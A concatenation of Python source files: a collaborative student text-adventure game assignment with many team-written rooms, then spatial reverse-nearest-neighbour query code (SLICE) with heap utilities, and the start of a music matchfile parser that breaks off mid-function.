#### File: 2019-fall-csc-226/t04-master/t04_refactored.py ```python import random from time import sleep delay = 1.0 # change to 0.0 for testing/speed runs; larger for dramatic effect! dead = False def start_story(): """ Introduction text for the story. Don't modify this function. :return: the user's name, captured from user input """ user = input("What do they call you, unworthy adversary? ") print() print("Welcome,", user, ", to the labyrinth") sleep(delay) print("Before you lies two paths. One path leads to treasures of unimaginable worth.") print("The other, certain death. Choose wisely.") print() sleep(delay * 2) print("You are in a dark cave. You can see nothing.") print("Staying here is certainly not wise. You must find your way out.") print() sleep(delay) return user def end_story(user): """ This is the ending to the story. Don't modify this function, either. :param user: the user's name :return: None """ print( "Congratulations, " + user + ", you have made it to the end of this... strange... adventure. I hope you feel accomplished.") print() print() print() sleep(delay * 5) print("Now go play again.") def kill_if_dead(dead): """ Simple function to check if you're dead :param dead: A boolean value where false let's the story continue, and true ends it. :return: None """ if dead: quit() ################################################################################### def scott_adventure(): """ My original adventure text I gave as an example. Leave it alone as well. :return: None """ global dead # You'll need this to be able to modify the dead variable direction = input("Which direction would you like to go? [North/South/East/West]") if direction == "North": # Good choice! print("You are still trapped in the dark, but someone else is there with you now! I hope they're friendly...") sleep(delay) elif direction == "South": # Oh... Bad choice print("You hear a growl. Not a stomach growl. More like a big nasty animal growl.") sleep(delay) print("Oops. Turns out the cave was home to a nasty grizzly bear. ") print("Running seems like a good idea now. But... it's really, really dark.") print("You turn and run like hell. The bear wakes up to the sound of your head bouncing off a low stalactite. ") print() sleep(delay * 2) print("He eats you. You are delicious.") dead = True else: # Neutral choice print( "You're in another part of the cave. It is equally dark, and equally uninteresting. Please get me out of here!") sleep(delay) kill_if_dead(dead) ################################################################################### def team_1_adv(): global dead sleep(delay * 2) print("\n\nYou continue on with your journey. You happen to stumble across a bomb.") print("God offers you some wirecutters. With nothing to lose, you decide to be a hero.") print("You unscrew the bomb. In front of you are three wires: red, blue, and yellow.") sleep(delay * 2) print("Which wire will you choose, dude?") color = input("Red, Blue, or Yellow?") if color == "red": # The good choice print("You suck in a breath and then cut the wire. The LEDs flicker, then shut off. You did it!") elif color == "blue": # The bad choice print("You suck in a breath and then cut the wire. ") print("The bomb explodes into a white light. You die instantly.") dead = True else: print("You suck in a breath and cut the yellow wire.") print("") print("Nothing explicitly happens, but suddenly you have a loaf of banana nut bread in your pocket.") print("... You decide to move on.") kill_if_dead(dead) """This function runs one room where you have to choose which wire to cut in a bomb. Choose wisely!""" def team_2_adv(): ###################################################################### # Author: <NAME> & <NAME> # Username: zapatamezaj & maynardb # # Assignment: T04: Adventure in Gitland # # Purpose: To recreate a choose-your-own-adventure style game # by refactoring T01. ###################################################################### """ Google Document Link: https://docs.google.com/document/d/1N2BXxH4VsnbuLDMHqq_gNpbawFb-_D3vbwr5oPuuR8g/edit?usp=sharing""" global dead print("Congratulations! \n" "You have survived so far. But the journey does not end for the gold still lays undiscovered. \n ") sleep(delay * 2) direction = input("Which way would you like to go now? Choose wisely North, East, West or South?\n") if direction == "East": # Good choice print("You have proven how worthy you are so the gods have decided to reward you with Gold. \n " "You are rich now go home and spread your wealth! \n") elif direction == "North": # Bad choice print("This trip is only for the worthy. You have been found unworthy and the gods have sacked your soul.\n") dead = True elif direction == "West": # Bad choice print("Some wolves come by and urinate all over your stuff, then eat your face off. \n" "Tragic, you could have been rich but now you're dead.") dead = True else: print("You were found by a group of robbers. They know you have enough food and gold to last you days. \n" "They loot you and leave you for the bears.") dead = True sleep(delay) kill_if_dead(dead) print("You're in the cave, its night time and you began to hear screams from one of two paths.") direction = input("Which path will you take, East or West? Choose wisely.") if direction == "East": print("""Congratulations! You have found the exit and have made it out with only a few scratches and maybe some broken bones, but look on the bright side, at least you're alive.""") else: print("You become curious of the screams and follow them. \n" "You stumble upon a group of rich cave people that party and they invite you to join them") kill_if_dead(dead) def team_3_adv(): """ Authors: <NAME> Google Link: https://docs.google.com/document/d/1OFzXphHUyPa6YQpFq5rVqsW-1NFc8JwoCqsTKO79Lbw/edit?usp=sharing :return: N/A """ username = input("What do you call yourself?") action = input_action() ask_action(username, action) sleep(delay) def input_action(): """ Starts the story, asks user to select an option. :return: Returns the result of the variable 'action'. """ print("You are being chased by a group of goblins.") print("You and your friend for some reason decide to run to a cliff. What do you do?") action = input("[Sleep | Jump | Do Nothing | Fight] ") return action def ask_action(username, my_input): """ This function will generate a set list of prompts based upon the my_input variable. :param username: Utilizes the users name in the print functions. :param my_input: Allows the user to input a finite selection of options to further the program. :return: N/A """ if my_input == "sleep" or my_input == "Sleep": # Good choice sleep(delay) print("Amazing! Good job, ", username, "! You have found their weakness! Goblins can't see sleeping people...") sleep(delay) print("As you awake, you notice some golden coins one of the goblins left behind.") sleep(delay) elif my_input == "do nothing" or my_input == "Do nothing": # Bad choice print("Do nothing? YOU DIE!!!!") sleep(delay) if dead: print("Oh no! You died. Better luck next time! Try again by hitting the green play button. ") kill_if_dead(dead) elif my_input == "fight" or my_input == "Fight": print("You have proved so brave", username, ". Go on with your journey!") elif my_input == "jump" or my_input == "Jump": print("At the bottom of this cliff lies waves of fast flowing water. Jumping was not a good choice!") else: print("The choice you entered is not available. Please enter a valid choice.") # Finished, yay! def team_4_adv(): pass # TODO Add your code here def test_the_rainbow(flavor): """ Editors: <NAME> <NAME> Function takes the input given by the user and checks to see if it is similar to one of the three options given. If it isn't, it returns "True" so the question can be repeated. :return: True """ if len(flavor) == 9 and flavor[0] == "s" and flavor[8] == 'y': # Good choice! print("Good choice!This makes you feel a lot better") print("considering your friend disappeared mysteriously the other day.\n") sleep(delay) elif len(flavor) == 10 and flavor[0] == "p" and flavor[9] == 'o': # Neutral choice print("You feel a tingling sensation in your throat, and you start puking blood and pistachios.") print("As everything starts going black, you vaguely hear evil laughter. ") print("The ice cream van starts up and a merry song starts playing and slowly fades away \n") elif len(flavor) == 9 and flavor[0] == "c" and flavor[8] == 'e': # Oh... Bad choice print("Here you go, this is a van favorite!") sleep(delay) print("Oh it tastes so familiar but not in a good way") print("At first you don't realize it but then you start feeling nauseous") print("You start vomiting and ask 'What the hell was that?'") print("The ice cream people tells you: Don't worry! It's just your friend! \n") # Kill the player and end the program if this choice is made kill_if_dead(True) else: return True def team_5_adv(): """ ###################################################################### # Assignment: T04: Adventure in Gitland # Editors: <NAME> # <NAME> # Google Doc: https://docs.google.com/document/d/1icOBu4PV5DDGkWtmThEnmaj2JaOW1aoW9Yujh0_caLo/edit?usp=sharing ###################################################################### :return: """ typo = True while typo == True: flavor = input("Which flavor would you like? [Strawberry/Pistachio/Chocolate]") print() flavor.lower() typo = test_the_rainbow(flavor) if typo == True: print("Looks like the answer you provided isn't close to your choices") sleep(delay) print("Please try again unless you want to be stuck here forever... \n") def team_6_adv(): pass # TODO Add your code here def team_7_adv(): """ https://docs.google.com/document/d/1Dh_Zd3X9bS8DijgocvDM0IqgX9UTT2eTzIUM_Pj_I-U/edit?ts=5d7ba1f3#heading=h.f6tumop9n7at :return: None """ global dead direction = input("Which direction would you like to go? [Right/Forward/Backward/Left]") direction = direction.lower() #changes the user's input to lowercase if direction == "right": # Good Choice! print("You rush into the nearby trees for cover. There you find a mystical coconut that will slay the dragon.") sleep(delay) elif direction == "forward": # Bad Choice integer = int( input( "You have made a bad choice! You have one more chance to avoid being burnt alive. Pick a number.")) if integer <= 50: print("You have saved yourself and spared yourself from the dragon!") elif integer > 50: print("You failed to make a better decision and gave the dragon time to get the BBQ sauce.") print("You have decided to run towards the dragon. The dragon scoffs and burns you to a crisp.") dead = True kill_if_dead(dead) sleep(delay) else: pass # Oh...Bad Choice print("You reach the end of the cave uneventfully. Continue on!") def team_8_adv(): """ https://docs.google.com/document/d/1_Qj83TBpX5Doe6TMSEJ5TJ3kR8oNaE6qu6pPN4iCceA/edit?usp=sharing :return: """ # TODO Add your code here ####################################################################################### # eubanksn and mualcinp # T04 # Fixing code ###################################################################################### # TODO Team 8 sleep(delay) username = input("Who are you?") print() print("Thum.. Thum.. Thum.. You hear footsteps approaching.") sleep(delay * 2) print("Hello,", username, "I am the spirit of this cave. Here, take some food to help you with your journey.") choice = input("Take the food? [yes/no]") choice = choice.lower() if choice == "yes": print("You took the food and ate it. Now you have enough energy to continue on your journey.") sleep(delay) print("Congratulations! You made a wise choice.") elif choice == "no": second_choice = int(input( "\nOkay, you don't have to eat all the food but you must take some bites. How many bites are you going to " "take? [0-200]")) while True: if second_choice >= 0: if second_choice > 100: print("\nYou ate too much and exploded, you gluttonous fiend!") deceased = True elif second_choice == 0: print("\nYou get hungry and your energy level drops. You pass out.") deceased = True elif 100 >= second_choice > 0: print("\nYou took the food and ate it. Now, you have enough energy to continue on your journey.") print("Congratulations! You made a wise choice.") break second_choice = int(input( "That is not possible. Now, lets try again. How many bites would you like to take? Input a number from " "0-200 this time. ")) else: print("Enter either 'yes' or 'no'. The spirit of the cave would not take any other answers.") if deceased: print("A bear comes across your mangled, exploded body. You wake up dead.") quit() # TODO Don't forget to check if your user is dead at the end of your chapter! def team_9_adv(): ###################################################################### # Author: <NAME> & <NAME> # Username: Wellst & Millerd2 # # Assignment: T04: Adventure in Gitland # # Google docs: https://docs.google.com/document/d/1tQqF_Y0WmdpPVzTq3wAzf5_kX4x5tzHtdvdRv92qHp8/edit?usp=sharing ###################################################################### death = False print("You see a dim light glowing behind a loose boulder. Do you choose to investigate?") choice = input("[Yes/no/leave]") sleep(delay) if choice == "Yes": print("You place your hand against the boulder and it dissipates into the air like fine mist. Behind it you") print("see a giant sword bigger than most men.") sleep(delay) print("A giant humanoid creature enters your view and begins to grab the sword.") sleep(delay * 2) print("He swings the sword in your direction causing the timid ceiling to collapse in between you saving ") print("yourself from the giant beast. ") print("You are safe for now, and you begin to search for a way out..") # # sleep(delay) elif choice == "no": print("You choose to hastily run away from the boulder and you begin to lose your footing.") sleep(delay) print("You trip and fall forward breaking your neck in the most boring possible fashion") death = True else: print("You decide against your gut and move away from the glowing boulder.") sleep(delay) print("You leave the cave by following the sounds of wilderness outside. You begin to hear some disgruntled") print("shuffling in the cave as you leave.") kill_if_dead(death) pass def team_10_adv(): # Google Doc: https://docs.google.com/document/d/1XwjthTBbExLqfs_fXTbGp70kUGsyPTzwsMwP5XOjrJ4/edit?usp=sharing # TODO Team 10 # Beginning of the Amulet Encounter Chapter global dead print() print("You are in a room with strange symbols all over the walls.") print("Looking at the eldritch markings makes your head hurt just by looking at them.") print("You see an amulet floating in the middle of the room over a pedestal.") print() amuletAction = input("What do you want to do? [Wear/Ignore/Destroy]") print() if amuletAction == "Wear" or "wear" or "WEAR": # Bad choice print("Nothing happens... ") sleep(delay * 3) print("...") sleep(delay * 3) print("You feel strange, your hands starts twitching uncontrollably.") print("You start walking back into the darkness, not in control of your own actions.") # Begin Test of Wills print() print("You're body is under new management at the moment.") print("The walls begin to morph, forming words you can comprehend, requesting a number.") amuletSave = input("What is The Ultimate Answer to Life, The Universe and Everything?") if int(amuletSave) == 42: print() print("Your body starts responding again.") print("You seem to have shaken off the evil manipulation.") print("Harrowed by your brush with death, you carry on, deeper into the labyrinth") elif 41 <= int(amuletSave) <= 43: print() print("Close enough!") print("You shake off the control with moments to spare and come to your senses.") print("You twitch one last time and run for you life, towards (unlikely) safety...") else: print("INCORRECT MORTAL!!!") print("NOW DIE FOR YOUR IGNORANCE!") dead = True elif amuletAction == "Destroy" or "destroy" or "DESTROY": # Good option print("As you cast the amulet into some previously un-narrated lava, you feel watched by a giant eye.") print("As the amulet disintegrated, you feel a cursed being lifted from the Median-Earth.") print("Satisfied with your good deed for the day you carry on deeper into the labyrinth...") print() elif amuletAction == "Ignore" or "ignore" or "IGNORE": # Boring option print("So you ignore the floating mystical artifact in the middle of the room.") print( "We went through all of the trouble in making a cool, levitating, magic item for you and you ignore it...") print("Way to go, you hurt our creative pride.") print("Well, I guess you can carry on, further deeper into the depths of the labyrinth...") print("Away from anything fun...") print() else: # Just in case option print("Somehow, our scenario wasn't interesting enough for you to even answer properly.") print("Whatever you just did somehow broke the laws of causality and you glitch") print("through a lamp using a backwards long jump and end up in a parallel dimension in another room...") print() if dead == True: print("Congratulations! You've been possessed by an ancient evil!") print("Don't mess with cursed objects kids!") print("Better luck next time! Try again by hitting the green play button in the top right. ") kill_if_dead() print() print() def team_11_adv(): pass # TODO Add your code here # This is the start of team twelve's work. def choosing(choice2): """ this function present the user with the yes or no choice. Yes: progress, No:dead """ if choice2 == "yes": print("Great you refilled your health ") elif choice2 == "no": print("you die from starvation?!") sleep(delay) dead() else: # neutral choice print("you later found berries in the dark hall") def choosing1(choice3): """This function gives you two choices, one opens the door, the other is death """ if 0 < choice3 <= 10: print("A door opens") elif choice3 > 10: print(" You fall to your death") dead() def team_12_adv(): """ This is Imma and Sama's part of the adventure. Enjoy! here's our google doc: https://docs.google.com/document/d/1vQBVi9MWeufUl-xCIQGYaNfP7oAsKXdWE0a3dMO0pmo/edit?usp=sharing """ # def choosing(choice): # def dead(): # quit() print("You walk into a room and see a glass of milk sitting on a table. Do you drink it?)") choice1 = input("[yes/no] ") choosing(choice1) sleep(1) print("In the dark hall you see a libra scale. You have to set the scale equal to a bar of silver.") choice = int(input("Pick a number")) choosing1(choice) # TODO Don't forget to check if your user is dead at the end of your chapter! ######################################################################################################### # TODO Add your code here def team_13_adv(): sleep(delay * 3) global dead print("") print("") print("It seems like you will be here a while.") print("You see two doors in front of you. One is made of wood. It looks like it is about to fall off.") print("The other door is just plants. All you gotta do is walk through and you're on the other side. ") print("There is also a doorway with no door. ") choice = input("Where will you go? [Wood/Plant/No door] ") if choice == "Wood": print("As you push the door open, it falls off. ") print("The loud noise wakes up the polar bear sleeping inside. It then proceeds to devour you with salt.") dead = True elif choice == "Plant": print("You brush the plants to the side and walk through the doorway.") print("This opens up a secret path. You follow this path for hours.") print(" You somehow ended up at the same doorways that you encountered earlier.") elif choice == "No door": print(" You walk through the doorway and you see a faint light in the distance. You run to this light.") print("You discover a chest. You open the chest and find food and water in the chest!.") print("After eating, you continue to walk on and eventually find the Exit. ") print("You are free!") if dead: print("You have been eaten by the polar bear!") kill_if_dead(dead) pass # TODO Add your code here #################################################################################################################### def team_14_adv(): """ Google Drive: https://docs.google.com/document/d/1hVrBRHrbbXxCU74zEOyzQhHAzuYbB5O3eAddp6hoWnw/edit?usp=sharing Partner 1: <NAME> Partner 2: <NAME> :return: """ global dead print("\nYou stumble into the woods. \nThere are three paths in front of you.\n") answer = input( "Which direction do you want to go? [North (N) /East (E) /West(W)] ") if answer.lower() == "north" or answer.lower() == "n": # Bad choice print("\n You are being chased by wolves.") sleep(1) print("Try to run away! Good luck!") sleep(1) safe = input("How long do want to run? [1-10]") try: a = int(safe) if int(safe) >= 7: print("\nThe wolves get tired of chasing you.") else: print("Oh no. They caught you.") except ValueError: print("\nOh no. They caught you.") dead = True elif answer.lower() == "west" or answer.lower() =="w": # Good choice print("You stumbled into a clearing. \nYou escape the woods.") elif answer.lower() == "east" or answer.lower() == "e": # Neutral choice print("The path leads you deeper into the woods. \nYou are now lost.") else: print("You can't think clearly. \nYou sit there for eternity.") dead = True if dead: kill_if_dead(dead) else: print("Keep going. You are still alive.") ############################################################################################################ def team_15_adv(): """ https://docs.google.com/document/d/1vE7M-wYzNrrqdWcMP472itZB_IBkW2anDfiU1cYA3Sk/edit?usp=sharing :return: """ global dead # TODO Add your code here ######################################################################################################### # TODO Team 15 ###################################################################### # Author: <NAME>, <NAME> # Username: mastriyanag, AlexMeadors # # Assignment: T04: Adventure in Gitland # # Purpose: To recreate a choose-your-own-adventure style game # by refactoring T01. # # Each "twist" in the story is from a different group. The resulting story # will either be incoherently random, or entertainingly "Mad Lib" like. # Either way, it should be fun! # # This new version will take advantage of functions, as well as # demonstrate the value of git as a tool for collaborating. ###################################################################### # Acknowledgements: # Original Author: <NAME> # ###################################################################### messages = ["You come upon three doors.", "The one on the left has a light glowing from underneath.", "The one in the middle looks old and cracked.", "The one on the right is made of rusted metal."] for i in messages: print(i) sleep(delay * 3) direction = input("Which door will you choose? [Left, Middle, Right]") if direction.lower() == "right": # Good choice print( "You can barely see because the room is so dark and dusty. " "\nYou light your torch and see the room is filled to the brim with gold and jewels!.") sleep(delay * 4) print("Congratulations, you're rich!") choice = 0 elif direction.lower() == "left": # Worst choice print( "You step through the door onto a thin sheet of ice. Below the ice, electricity arcs from one " "electric eel to another.\nYou turn quickly to walk back out the door and...") sleep(delay * 3) print("A golden dragon appears, he offers to help if and only if you can guess a number between 1 to 10") number = input("What number do you choose?") dragon_guess = False for i in range(5): if ord(number[0]) == (54 + i) or (ord(number[0]) == 49 and (ord(number[-1]) == 48) and (len(number) == 2)): dragon_guess = True if dragon_guess: print("He offers you a ride to safety, you come out with no major injuries.") choice = 2 # Death else: print("The ice breaks! You are electrocuted while you are drowned... ") dead = True choice = 1 else: # Boring choice messages = ["You open the middle door. Behind the door you find a long passage with stairs that seem to go up" " forever.", "...", "....", ".....", "You realize this tunnel is leading to nowhere and close your eyes, wishing for an escape."] for i in messages: print(i) sleep(delay * 2) choice = 2 choicestrings = ["You collect your treasure and you move on to the next part of the cave", "You die, try again to test your fate again!", "You open your eyes and you are in a new place. You are alive, but somewhat bored and disappointed."] print(choicestrings[choice]) kill_if_dead(dead) def check_if_exist(string): """ Checks to see if the direction the user choose exists, and if it does it continues the story line. :param string: """ global dead available_inputs = ["right", "left", "backwards", "forwards"] # Directions the user can choose given_input = string.lower() if given_input in available_inputs: if given_input == "right": # Good Choice! print("You rush into the nearby trees for cover. There you find a mystical coconut that will slay the" + " dragon.") sleep(delay) elif given_input == "forwards": # Bad Choice # print("You almost made a bad choice! The dragon hasn't seen you yet! Pick a number.") integer = int( input( "You have made a bad choice! You have one more chance to avoid being burnt alive. Pick a " + "number. [1,2]")) if integer == 1: print("You have saved yourself and spared yourself from the dragon!") elif integer == 2: print("You failed to make a better decision and gave the dragon time to get the BBQ sauce.") print("You have decided to run towards the dragon. The dragon scoffs and burns you to a crisp.") dead = True sleep(delay * 2) # Finished! else: # Oh...Bad Choice print("You just got eaten by man-eating roaches!") sleep(delay * 2) print("Try to pick another direction to follow next time!") dead = True # Finished the user has died! else: print("I do not exist, choose another direction...") ask() def ask(): """ asks a question about which direction the user wants to go """ x = input("Which direction would you like to go? [Right/Forwards/Backwards/Left]") check_if_exist(x) def team_16_adv(): ###################################################################################################### # Author: <NAME> and <NAME> # Username: garrettz and morenoa # Assignment: T04_Adventures in Gitland # Google Drive Link: smallyourl.appspot.com/B5odmlCDM # Acknowledgements: ###################################################################################################### global dead # If user chooses wrong direction they will die ask() if dead: print("Oh no! You died. Better luck next time! Try again by hitting the green play button.") quit() def team_17_adv(): pass # TODO Add your code here def team_18_adv(): pass # TODO Add your code here def team_19_adv(): pass # TODO Add your code here def team_20_adv(): pass # TODO Add your code here def main(): """ The main function, where the program starts. :return: None """ user = start_story() paths = [scott_adventure, team_1_adv, team_2_adv, team_3_adv, team_4_adv, team_5_adv, team_6_adv, team_7_adv, team_8_adv, team_9_adv, team_10_adv, team_11_adv, team_12_adv, team_13_adv, team_14_adv, team_15_adv, team_16_adv, team_17_adv, team_18_adv, team_19_adv, team_20_adv] random.shuffle(paths) # Shuffles the order of paths, so each adventure is different for i in range(len(paths)): paths[i]() # Runs each function in the paths list end_story(user) main() ```
{ "source": "2019ly/CSD", "score": 3 }
#### File: CSD/common/__init__.py ```python from heapq import heappop, heappush, heappushpop, heapify, _heapify_max, _heappushpop_max, _siftdown_max, _siftup_max from collections import Iterable from math import cos, ceil, pi, sin from shapely.geometry import Polygon, Point def circle(o, r, resolution=None): if r <= 0: raise ValueError("r must be a number greater than 0") if resolution: return o.buffer(r, int(ceil(pi * r * 2 / resolution / 4))) else: return o.buffer(r, 32) def sector(o, r, angles, resolution=None): c = circle(o, r, resolution) if abs(angles[0] - angles[1]) >= pi: raise ValueError('abs(angles[0] - angles[1]) must be less than Pi') l = r / cos(abs(angles[0] - angles[1]) / 2) triangle = Polygon( [(o.x, o.y), (o.x + cos(angles[0]) * l, o.y + sin(angles[0]) * l), (o.x + cos(angles[1]) * l, o.y + sin(angles[1]) * l)]) s = triangle.intersection(c) s.o = o s.r = r s.angles = angles return s def partitions(origin, space, n): bounds = space.bounds r = Point((bounds[0], bounds[1])).distance(Point((bounds[2], bounds[3]))) return [sector(origin, r, [2 * pi / n * i, 2 * pi / n * (i + 1)]) for i in range(n)] def heappush_max(heap, item): heap.append(item) _siftdown_max(heap, 0, len(heap) - 1) def heappop_max(heap): last = heap.pop() if heap: return_item = heap[0] heap[0] = last _siftup_max(heap, 0) else: return_item = last return return_item class MinHeap(Iterable): def __init__(self): self.items = [] def pop(self): return heappop(self.items) def push(self, item): heappush(self.items, item) def first(self): if len(self.items) > 0: return self.items[0] else: return None smallest = first def __len__(self): return len(self.items) def __iter__(self): for i in self.items: yield i class MaxHeap(Iterable): def __init__(self): self.items = [] def pop(self): return heappop_max(self.items) def push(self, item): heappush_max(self.items, item) def first(self): if len(self.items) > 0: return self.items[0] else: return None largest = first def __len__(self): return len(self.items) def __iter__(self): for i in self.items: yield i class NSmallestHolder: def __init__(self, n): self.items = [] self.n = n def push(self, item): if len(self.items) < self.n: self.items.append(item) if len(self.items) == self.n: _heapify_max(self.items) else: _heappushpop_max(self.items, item) def first(self): if len(self.items) > 0: return self.items[0] else: return None largest = first def __len__(self): return len(self.items) def __iter__(self): for i in self.items: yield i class NLargestHolder: def __init__(self, n): self.items = [] self.n = n def push(self, item): if len(self.items) < self.n: self.items.append(item) if len(self.items) == self.n: heapify(self.items) else: heappushpop(self.items, item) def first(self): if len(self.items) > 0: return self.items[0] else: return None smallest = first def __len__(self): return len(self.items) def __iter__(self): for i in self.items: yield i def plot_points(ax, data, color, size, label): x = [geom.x for id, geom in data] y = [geom.y for id, geom in data] ax.plot(x, y, '.', markersize=size, color=color, label=label) def plot_stars(ax, data, color, size, label): x = [geom.x for id, geom in data] y = [geom.y for id, geom in data] ax.plot(x, y, '*', markersize=size, color=color, label=label) ``` #### File: CSD/RkNN/SLICE.py ```python from math import cos, pi, sin, acos from time import time from numpy.linalg import norm from shapely.geometry import Point import numpy as np import common def MonoRkNN(q_id, k, index, with_statistics=False): partition_num = 12 begin_time = time() q = index.geometries[q_id] sigLists, unpruned_area, pruning_io = pruning(q_id, q, k + 1, index, partition_num) pruning_io += 1 pruning_time = time() result, verification_io, candidate_num = mono_verification(q, k, sigLists, unpruned_area) verification_time = time() verified_candidate_num = candidate_num if with_statistics: return result, pruning_time - begin_time, verification_time - pruning_time, pruning_io, verification_io, candidate_num, verified_candidate_num else: return result def mono_verification(q, k, sigLists, unpruned_area): result = list() candidates, IO = mono_retrieve_candidates(sigLists, unpruned_area) sigLists = [sorted(s, key=lambda c: c[0]) for s in sigLists] for candidate in candidates: if mono_is_RkNN(q, candidate[0], candidate[1], k, sigLists): result.append(candidate) return result, IO, len(candidates) def mono_is_RkNN(q, candidate_id, candidate, k, sigLists): i = sector_id(candidate, q, len(sigLists)) count = 0 sigList = sigLists[i] for r_l, f_id, f in sigList: if candidate_id == f_id: continue if candidate.distance(q) < r_l: return True if candidate.distance(f) < candidate.distance(q): count += 1 if count >= k: return False return True def mono_retrieve_candidates(sigLists, unpruned_area): candidates = list() visited = set() for sigList in sigLists: for r_l, f_id, f in sigList: if f_id not in visited: visited.add(f_id) if unpruned_area.intersects(f): candidates.append((f_id, f)) return candidates, 0 def BiRkNN(q_id, k, facility_index, user_index, with_statistics=False): partition_num = 12 begin_time = time() q = facility_index.geometries[q_id] sigLists, unpruned_area, pruning_io = pruning(q_id, q, k, facility_index, partition_num) pruning_io += 1 pruning_time = time() result, verification_io, candidate_num = bi_verification(q, k, user_index, sigLists, unpruned_area) verification_time = time() verified_candidate_num = candidate_num if with_statistics: return result, pruning_time - begin_time, verification_time - pruning_time, pruning_io, verification_io, candidate_num, verified_candidate_num else: return result def pruning(q_id, q, k, index, partition_num): partitions = common.partitions(q, index.space, partition_num) sigLists = [[] for i in range(partition_num)] upper_arc_radius_heaps = [common.MaxHeap() for i in range(partition_num)] shaded_areas = [calculate_shaded_area(partition, partition.r) for partition in partitions] h = common.MinHeap() IO = 0 h.push((0, index.root)) while len(h) > 0: e_dist, e = h.pop() if may_contains_significant_facility(e, shaded_areas): if e.is_data_node: pruneSpace(q_id, e, k, partitions, sigLists, upper_arc_radius_heaps, shaded_areas) else: for child in e.children: h.push((child.geom.distance(q), child)) IO += 1 unpruned_area_list = list() for i in range(partition_num): r_b = min(upper_arc_radius_heaps[i].first(), partitions[i].r) angles = [2 * pi / partition_num * i, 2 * pi / partition_num * (i + 1)] if r_b > 0: unpruned_area_list.append(common.sector(q, r_b, angles).buffer(0.01)) unpruned_area = reduce(lambda x, y: x.union(y), unpruned_area_list) return sigLists, unpruned_area, IO def pruneSpace(q_id, e, k, partitions, sigLists, upper_arc_radius_heaps, shaded_areas): f_id = e.obj if f_id == q_id: return f = e.geom for i in range(len(partitions)): partition = partitions[i] sigList = sigLists[i] upper_arc_radius_heap = upper_arc_radius_heaps[i] min_angle, max_angle = min_and_max_angle(f, partition) if min_angle < pi / 2: r_l, r_u = lower_and_upper_arc_radius(f, partition) bounding_arc_radius = float('inf') if len(upper_arc_radius_heap) < k or r_u < upper_arc_radius_heap.first(): upper_arc_radius_heap.push(r_u) if len(upper_arc_radius_heap) > k: upper_arc_radius_heap.pop() if len(upper_arc_radius_heap) == k: bounding_arc_radius = upper_arc_radius_heap.first() shaded_areas[i] = calculate_shaded_area(partition, bounding_arc_radius) if is_significant_facility(f, partition, bounding_arc_radius): sigList.append([r_l, f_id, f]) def bi_verification(q, k, index, sigLists, unpruned_area): result = list() candidates, IO = bi_retrieve_candidates(index, unpruned_area) sigLists = [sorted(s, key=lambda c: c[0]) for s in sigLists] for candidate in candidates: if bi_is_RkNN(q, candidate[1], k, sigLists): result.append(candidate) return result, IO, len(candidates) def bi_retrieve_candidates(index, unpruned_area): candidates = list() IO = 0 entries = {index.root} IO += 1 while len(entries) > 0: e = entries.pop() if unpruned_area.intersects(e.geom): if e.is_data_node: candidates.append((e.obj, e.geom)) else: for child in e.children: entries.add(child) IO += 1 return candidates, IO def bi_is_RkNN(q, u, k, sigLists): i = sector_id(u, q, len(sigLists)) count = 0 sigList = sigLists[i] for r_l, f_id, f in sigList: if u.distance(q) < r_l: return True if u.distance(f) < u.distance(q): count += 1 if count >= k: return False return True def is_significant_facility(f, partition, bounding_arc_radius): if partition.contains(f): if f.distance(partition.o) > 2 * bounding_arc_radius: return False else: M, N = get_M_N(partition, bounding_arc_radius) if M.distance(f) > bounding_arc_radius and N.distance(f) > bounding_arc_radius: return False return True def may_contains_significant_facility(e, shaded_areas): for area in shaded_areas: if area.intersects(e.geom): return True return False def calculate_shaded_area(partition, bounding_arc_radius): if bounding_arc_radius == 0: return partition.origin if bounding_arc_radius == float('inf'): bounding_arc_radius = partition.r sector = common.sector(partition.o, bounding_arc_radius * 2, partition.angles) m, n = get_M_N(partition, bounding_arc_radius) circle_m = common.circle(m, bounding_arc_radius) circle_n = common.circle(n, bounding_arc_radius) return sector.union(circle_m).union(circle_n) def get_M_N(partition, bounding_arc_radius): o = partition.o if bounding_arc_radius == float('inf'): l = partition.r else: l = bounding_arc_radius angles = partition.angles M = Point(cos(angles[0]) * l + o.x, sin(angles[0]) * l + o.y) N = Point(cos(angles[1]) * l + o.x, sin(angles[1]) * l + o.y) return M, N def min_and_max_angle(f, partition): o = (partition.o.x, partition.o.y) p1 = [o[0] + cos(partition.angles[0]), o[1] + sin(partition.angles[0])] p2 = [o[0] + cos(partition.angles[1]), o[1] + sin(partition.angles[1])] angles = [angle(o, p1, f), angle(o, p2, f)] return sorted(angles) def lower_and_upper_arc_radius(f, partition): min_angle, max_angle = min_and_max_angle(f, partition) dist_f_o = f.distance(partition.o) if max_angle >= pi / 2: r_u = float('inf') else: r_u = dist_f_o / (2 * cos(max_angle)) r_l = dist_f_o / (2 * cos(min_angle)) return r_l, r_u def angle(o, x, y): x = np.asarray(x) y = np.asarray(y) o = np.asarray(o) vector_ox = x - o vector_oy = y - o norm_ox = norm(vector_ox) norm_oy = norm(vector_oy) if norm_ox == 0 or norm_oy == 0: return 0 return acos(vector_ox.dot(vector_oy) / (norm_ox * norm_oy)) def sector_id(p, origin, sector_num): return int(angle_with_x(origin, p) / (2 * pi / sector_num)) def angle_with_x(p_start, p_end): dist = p_start.distance(p_end) if dist == 0: return 0 if p_end.y - p_start.y >= 0: return acos((p_end.x - p_start.x) / dist) else: return 2 * pi - acos((p_end.x - p_start.x) / dist) ```
{ "source": "2019paper/Symbolic-Melody-Identification", "score": 3 }
#### File: extra/data_handling/matchfile.py ```python import re import operator import numpy as np import codecs from ..utils.lang_utils import cached_property #################################################################### rational_pattern = re.compile('^([0-9]+)/([0-9]+)$') def interpret_field(data): """ Convert data to int, if not possible, to float, otherwise return data itself. :param data: some data object :returns: """ try: return int(data) except ValueError: try: return float(data) except ValueError: return data class ParseRationalException(Exception): def __init__(self,string): self.string = string def __str__(self): return 'Could not parse string "{0}"'.format(self.string) class Ratio: def __init__(self,string): try: self.numerator,self.denominator = [int(i) for i in string.split('/')] except: raise ParseRationalException(string) def interpret_field_rational(data, allow_additions = False): """Convert data to int, if not possible, to float, if not possible try to interpret as rational number and return it as float, if not possible, return data itself.""" global rational_pattern v = interpret_field(data) if type(v) == str: m = rational_pattern.match(v) if m: groups = m.groups() return float(groups[0])/float(groups[1]) else: if allow_additions: parts = v.split('+') if len(parts) > 1: iparts = [interpret_field_rational(i, allow_additions = False) for i in parts] # to be replaced with isinstance(i,numbers.Number) if all(type(i) in (int, float) for i in iparts): return sum(iparts) else: return v else: return v else: return v else: return v ################################################### def pitch_name_2_midi_PC(modifier, name, octave): if name == 'r': return 